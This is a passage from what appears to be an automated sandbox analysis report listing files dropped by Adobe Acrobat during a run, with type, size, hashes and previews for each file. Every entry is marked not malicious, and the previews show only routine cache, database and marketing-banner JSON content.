                                    Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):319
                                    Entropy (8bit):5.209918718562525
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2E5C970676B85F55E0503A55D8693483
                                    SHA1:270ED7AC9D4F311E7453D849AE34AD241E52849E
                                    SHA-256:0922A905D954ED48A9F4C2F5ADF8FC8A41AE3A0DBAE7B9E88023D1C4B4B4D27E
                                    SHA-512:6D82367E97E40BEBFF718A6D6F91D71DAA72185F3CA4C53B62568E5244DC405E01A0924BE50ADEF80FC80CE2A81721D79A12AEB5120BD398826701EB5113B4F6
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:2025/01/13-08:43:19.158 6c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/13-08:43:19.160 6c8 Recovering log #3.2025/01/13-08:43:19.161 6c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                    Category:dropped
                                    Size (bytes):65110
                                    Entropy (8bit):2.1275315296919457
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:1B13B8CC60019252ACEF386303295227
                                    SHA1:1BA455924A9221B8AAC4519E0AB7CFC0A447C498
                                    SHA-256:F38FF37C46B18D7956731C67AD0AEC823840E9EF226AB1AD567B4281DA70B31F
                                    SHA-512:FFCCE80D7E512DF10A331F628312F7ECAE5DC6E5A1C683AE380D345D84DBEE59809B6705CE1B5D025875E089F65686F40EE687E089E6AB363854A60EF0126D9B
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):57344
                                    Entropy (8bit):3.291927920232006
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                    SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                    SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                    SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:SQLite Rollback Journal
                                    Category:dropped
                                    Size (bytes):16928
                                    Entropy (8bit):1.2128421635053839
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:3A7E91CB056EAF637FED51D5733412CB
                                    SHA1:6EA65F821746F5356B256B1B876C8C25E954AA78
                                    SHA-256:97171FAF093775A27E8286ED8518B9452D98B8F86D789EFB21F19E3EEBAFC7AD
                                    SHA-512:948FA79FB1175FD08405C144B62A2C356FE68F1DEEB27D3B4906DD6ADD428EBAB4571CDACC1277C6CA4BEE88398627D1AE38F49270B9925EC2CBD7FA318C1203
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.... .c.....,..a........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):295
                                    Entropy (8bit):5.353729281657532
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:D88A80E6E587DD110103BF8F0D57B86C
                                    SHA1:47FEBCC44113133C937248F1B3120C8D12755F05
                                    SHA-256:19A5018493181A61BAB64F110DE3BF5BC6E58778C436AA62966C1710DC2D50D9
                                    SHA-512:953C20BFFD4F635DE0FF0E16DCACAEE9FD58DDD1160AB4584D016744C370B9B5FB032F7369FD636FB40A72EAE80573B638D7A55A6DA96B6C70483820E7B5F1DA
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):294
                                    Entropy (8bit):5.3003331786585886
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9541DEDE247E5D5BE6E46FAE3C6C2BDD
                                    SHA1:CEBE10D88467844429014BC50DA3D0B09D5BE85F
                                    SHA-256:6D42DC61FDC8BBDA9E4A8BFD960605D220913385F5FAFD2E168FF06F65CB60DC
                                    SHA-512:33C517D69789708B4CC5FD90EDAFC6BF3A154A533898EF965BF6ED38B21FE6107030E2C67C7EAD06DC4BFD1D8B66EA556BECED9C7DBFD0901E9E9F96B8D5C57B
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):294
                                    Entropy (8bit):5.279154253704188
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:1E71C183DF94481E298DA5596FAA447F
                                    SHA1:5456AD199C3A78B3EB1622C0B875229BF30D9AB3
                                    SHA-256:9D48C6C5A8B48DDFDCF9ACC1E8F8DB15C5D7B5FBCAC01F075ADD8B0281253A8D
                                    SHA-512:A17DC03BB027E82C73B04ABE0DE9D2850373954571172D418E40C501002FC086FB33891C266258B311128CB8B0AABD89B03BB89939419D9A0329360ABDF0EEC8
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):285
                                    Entropy (8bit):5.3417714316385405
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8598AAE9AA363A6CAAD7E42768063BD4
                                    SHA1:62592573556DD81AE9581005665500934FF54506
                                    SHA-256:4A5E2A65DE06EEF89EEFF5716F9D9EC53D0D7DF62554841C6734B2DC1FC6C5F5
                                    SHA-512:2D9988987720F5D6F503CE1366991F70602EFAB2484CC87A16561101C2F46EDB1A7843900112CC11D2F1E04DB98A941DBB16F96361357E8F89BA3A0C6F415034
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):1123
                                    Entropy (8bit):5.6856189069082514
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:6AD5B11383596E6431EA733F3811BE00
                                    SHA1:9F8DD453645BACB083DAE66B3ADB032670FE270D
                                    SHA-256:AE570AA8689A50EA28354841645767DC3BDD565DCFE6A14AB7B3F9C2C35F41E9
                                    SHA-512:937C34E38FB5B1DE66A27A71F584EBBBEA7637979CF651262C98EF8D1A1FE0DA2B1375B8DC05AFCD7BCEE2E6C42F426D43A24550DEB06C9B265D444A09B948DC
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):289
                                    Entropy (8bit):5.288044165448814
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A53BD30EEE85BC283D7534C37A2C9187
                                    SHA1:68881F4A2B2D5FB92746DED882504A3559163C96
                                    SHA-256:9B9DBD838525FEE7D2FA9BDF1C752E162F3AB988DCD8F293FC69EB417C099D13
                                    SHA-512:B6B89AF97786F7D6216FB46F99F936AC2D8E44049411C7345EDB73FC7A0E5E8ECC43C7985746BCE777EC75153900AFD7F8E6EE71BE02B14579F07F2046684B35
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):5.29111005090364
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E56432654A9192E2E51C2F6F43F355B7
                                    SHA1:C9A23F09306370BE3C3E9555132811D07E43336C
                                    SHA-256:19CC8C22EF42B83172D3395D5B06F09C7F0018B696EF3AF1A80277B986A88D8E
                                    SHA-512:D204FF6A6F039BA7E9D86F17157989196F0939490B0762D17D9F49E89998513A8E18571F416D93E17FD707A41EC891657F599B15BF686BB6B8C793BDC524886F
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):289
                                    Entropy (8bit):5.298352419248278
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4DDDA94B54BF9A2CC5C6F2392EF4B60C
                                    SHA1:7801B87A75DDA52AE7F9FA3888C0B234CF630537
                                    SHA-256:6FDC42D3CA9692D4B5392AE99FA05F03226456625DC4007960FEE7D09BD45984
                                    SHA-512:A33D9F2359E5811D4389A6A5B904A822B0ADFC9CB266998E3050A8A82B3DA7F70E832CBD1C4C3B7434180862463AD7918F044D8B9DD0EBB98E757CBC822C9BA8
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):295
                                    Entropy (8bit):5.313005295690839
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:58D50C13309F887D36C59E595897CD23
                                    SHA1:5C057CCBC3D5947E9FD9D62EBD5815964AAC6943
                                    SHA-256:D5211119B8AC8F139EFAB0083169BA23F4CD095AA21AAAAC3C0002FDB125CCF1
                                    SHA-512:BDED86D48A33AC8E658759158B53217331A20C959CA44A650C3CD9333AF104D89D29EB6690914A455AF5BF25579E8D53F8F3240AA9B8AAF68E7BE2167CEF8B65
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):289
                                    Entropy (8bit):5.29405736879756
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:7CCC5D84A61CB4F7FA56D9DF50D2695E
                                    SHA1:F84F1A0B5A6253B047C3E9179E5A847252E170BA
                                    SHA-256:B0CFBA2B6974C53CD4772D9C360D59DBF0114A76BF7C8B95C87FC95A2E779C08
                                    SHA-512:E9B52757623F31068275BC229624966426A330FE9770C5F97D16A4D00D361B8835F71D0FFB9E61779660E9E2CBD984666F2293BB5BAD05B1AA18BB129D11BA41
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):284
                                    Entropy (8bit):5.280584471452118
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2BBB1218E84EBB83930F6491A646759D
                                    SHA1:E29DEB2080F2BD5EB341AE5475DA721ED3414C32
                                    SHA-256:61D6B5DB3DBE0AC386A287027D2DE709564971EEADF9DD24D8BB8766B0C6FFE8
                                    SHA-512:266821498741E2A2C0DE6A7E6B3A5C92B3D2600ECD53938289216033AB4150ED20275BBD5DCE3C560EE4194211F7A0116ED243E89BFF7657078DADC854B177F4
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):291
                                    Entropy (8bit):5.277645309297558
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:0EFB116C62D7B0E3827DAC379CD7FF83
                                    SHA1:51859E4E4E4BE95A268B5202C3A328F4A4D2330F
                                    SHA-256:E58E095423E3C2803775132A617139E51909EB982BC41E320F5DAAEE4AC26769
                                    SHA-512:84F4F48D37B213281CE20F070F30F41EA58BE7C8196390FACFB68F2B07A1AD68D4289AA24A61639866AD7D089B9C4C1BE2FEEDC0650410E00B17C8062FDDDB08
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):287
                                    Entropy (8bit):5.281519651474218
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:ECF50FDAFE441450DD2C5E64E7AEC0A8
                                    SHA1:89C248B92F93D2BF13F452992BBB7686059C0E68
                                    SHA-256:F4894EF2E926EDF6486929839C08982A878B35949BC5F2D24F467C90F52CD775
                                    SHA-512:E29BB979D437E114E82ED8E7CA36C9C13064496780570079E62EC4459B31A2CE48113B6FCD9DEB7C2BE68C6506FA1FEEA2514C8B8DFFFBB6F7D9D7F9B9DC7FBF
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):1090
                                    Entropy (8bit):5.660595804679274
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5923F9CE84E04D69511266863FFAED5E
                                    SHA1:17B8C73CC0E8D37D1963EB0618B6694C0799732A
                                    SHA-256:B81727116FDB987AC66AE7C153A61795436914C75E5D1F092F2EA5890D272AA0
                                    SHA-512:0572A8B3CCD353E22E4515454D7CC62C45A57EFBC39CAFF1DBF588498F166E943B324DCE6C0F1CC20A89ED8DEC665E63664D22BAEF3C462191AD84B05A7BE1AD
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):5.257856458060224
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CD84363D17B35432BCC61D019766BA61
                                    SHA1:728599E7FDD71536FAC4E92AE3E2B849CB840E89
                                    SHA-256:EF89D22DCBFDA1B1BDFFF579BEFC8BC2C1019565A25BD705DB875F544FCADE1F
                                    SHA-512:9251271672B528A0D015A6F1251B0ECA5D805FC89F2792E654AD83D0EFBB590A14F724EC6FD2826B0361B2CF59A9A3FD9BCF692B32B782A80DEE5839A607EE0E
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):5.270460484829795
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A24EF551785C7FBFF015CD9526EAA259
                                    SHA1:1AC98F2F5A7E440B93E853E04DFF6279784632EF
                                    SHA-256:8E558C2E513359CC98B864D71B5D0690825C72CB5D947BF0B7F1E6C37C1932CF
                                    SHA-512:944A307129F8E3FE2FFFD065EF7F3B5C96ACD6086B043E011C82886684692F002CC362B2D6539E64D1F039BB127506B6B53DEC56222EC230265160E0FFB6CA48
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"analyticsData":{"responseGUID":"eed45c31-8eaa-429a-a375-00738c1f9135","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736949535283,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):0.8112781244591328
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:....
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):2814
                                    Entropy (8bit):5.134543817504014
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:208ACC7D421BC2842E8C5E39FA2693DB
                                    SHA1:52E3AE6F448C880EB0DF544F27E603928E997DEC
                                    SHA-256:F958290A1AC5233F1BCCEB9D0EA909E9E123028D7E80CC2AC80CC409B5ED2160
                                    SHA-512:25A61703630E9BA94A9EBF507554C35660F6C208059F6424D0BBC4D7C7E2F145E836B356A38289E7EBD6405CD682ACA1E6B9E110254A3C56FAD3DDF51403842D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"bb8aa74c14da0376213afdecf53ce92b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736775804000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"735781cc4059644715922d65f796d360","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736775804000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"335e967991d394b80ebfb15080f56b6b","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736775804000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1881e80bb24cfa18e2da6276210b84d9","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736775804000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ad6cdc7811462024ae04f0e03c2c2ac1","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736775804000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e29a4d51516d2cd14d6e5dca6621408b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                    Category:dropped
                                    Size (bytes):12288
                                    Entropy (8bit):0.9895221563423755
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8F0F9904DEBD89AF5AD29A1E250C0306
                                    SHA1:CA326DA080D201C71A720095B36696AFDEACE9E2
                                    SHA-256:280D90A1D62C8A6850DB1FF8D446BCCB293D572E4D6C1A72B4E9514FB06410E3
                                    SHA-512:5C437C5EAC3F28B850CD09DDEDB71CC7D3373F655034296804286AAAA2358062C727D8871160EE7D4EEDBBD4D2AA83287C7E9D9554F973D193D70C9C932213F4
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:SQLite Rollback Journal
                                    Category:dropped
                                    Size (bytes):8720
                                    Entropy (8bit):1.3450844696261512
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B80F36A1E9A49084E9E112CDF66F4023
                                    SHA1:9FAA12FC3A37163F4108F036735D9957C5CE598C
                                    SHA-256:CCC10CD729D4FED043AAEBAE2A7EF8240996D57CDAF7D4F9ED829D8FCE24709A
                                    SHA-512:024B8F7D0E944B1AE4AFD550F765FA49C53E3CA44E5F96FC7B945E4E56E202BE56A0390943612DFF262257F4903A1C5AF25E4CCEAD7D47FD984CA6BD63CAC21F
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.... .c......I.r......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):66726
                                    Entropy (8bit):5.392739213842091
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F3AA10C5C80AF66E05C4BD5BEB254C7E
                                    SHA1:AA8E275AF4ACDC6041A6C1FA5ED7598DAA70C731
                                    SHA-256:2897B437B65ACE41C37946AF2D6BC3F7257D733D8BB4EC1C00EEDBE3D2ABC60E
                                    SHA-512:A3A1730B51AA7B75546D663DEB83D7FDF23CD823BF1F8A947F5B7B78B738D3B07E3DBD79DF22A949ECF2C1DC2F26FA2123265305B9BD71EBDA355D091F30218C
                                    Malicious:false
                                    Reputation:unknown
